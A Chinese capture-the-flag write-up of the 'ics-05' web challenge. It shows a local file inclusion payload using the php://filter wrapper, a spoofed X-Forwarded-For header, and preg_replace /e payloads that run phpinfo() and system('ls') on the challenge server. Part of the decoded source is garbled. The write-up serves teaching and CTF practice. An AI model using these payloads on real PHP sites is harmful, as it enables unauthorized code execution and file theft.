web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)

题目

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第1张图片

打开页面显示如下

只有这个页面能打开

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第2张图片

显示如下

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第3张图片

用dirsearch扫一下

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第4张图片

查看了一下,发现没什么用

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第5张图片

查看页面源代码

返回了,写入的参数,猜测可能有文件包含漏洞

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第6张图片用php伪协议读取文件

构造payload

?page=php://filter/read=convert.base64-encode/resource=index.php

显示如下

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第7张图片

base64解码可得






    
    
    
    
    
    设å¤ç»´æ¤ä¸­å¿
    



    
    
设å¤å表












0) { //禁用了input die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?>





Welcome My Admin !
"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?>

ctype_alnum($text)函数会匹配传入参数中是否全为数字或者字母,如果是返回true,否则返回false。

strpos(string,find,start) 函数查找find在另一字符串string中第一次出现的位置(大小写敏感)。

preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换,如果启用/e参数的话,就会将replacement当做php代码执行。

用bp伪造xff执行

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第8张图片

利用preg_replace函数/e漏洞

preg_replace()函数的/e漏洞
正确的php system()函数的书写

preg_replace($pattern, $replacement, $subject)
作用:搜索subject中匹配pattern的部分, 以replacement的内容进行替换。
$pattern:       要搜索的模式,可以是字符串或一个字符串数组。
$replacement:   用于替换的字符串或字符串数组。
$subject:       要搜索替换的目标字符串或字符串数组。

就是替换字符串,要使 replacement 参数是我们想要的php代码即可

代码分析

123 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1')  //使用插件X-Forwarded-For Header改地址,
     {                                                
124 
125     echo "
Welcome My Admin !
"; 126 127 $pattern = $_GET[pat]; 128 $replacement = $_GET[rep]; //判断三个变量存不存在,在进行perg_replace函数 129 $subject = $_GET[sub]; 130                                 //这里的三个变量都是由我们输入,就方便多了                       131 if (isset($pattern) && isset($replacement) && isset($subject)) { 132 preg_replace($pattern, $replacement, $subject); 133 }else{ 134 die(); 135 }

先测试一下

payload如下

?pat=/test/e&rep=phpinfo()&sub=test 

测试成功,成功返回执行phpinfo()

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第9张图片

构造payload

?pat=/test/e&rep=var_dump(`dir`)&sub=test
or
pat=/php/e&rep=system("ls")&sub=test

显示如下

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第10张图片

得到目录s3chahahaDir

访问后显示如下

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第11张图片

进入flag/,发现flag.php

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第12张图片

直接点进去是空白的

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第13张图片

通过伪协议读取flag.php

payload

?page=php://filter/read=convert.base64-encode/resource=s3chahahaDir/flag/flag.php

得到

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第14张图片

base64解码,得到flag

web:ics-05(本地文件包含漏洞、preg_replace函数/e漏洞、php伪协议读取文件)_第15张图片

参考文章内容

ics-05(命令执行漏洞及伪协议读取)

你可能感兴趣的:(CTF-web,前端,网络安全,web安全)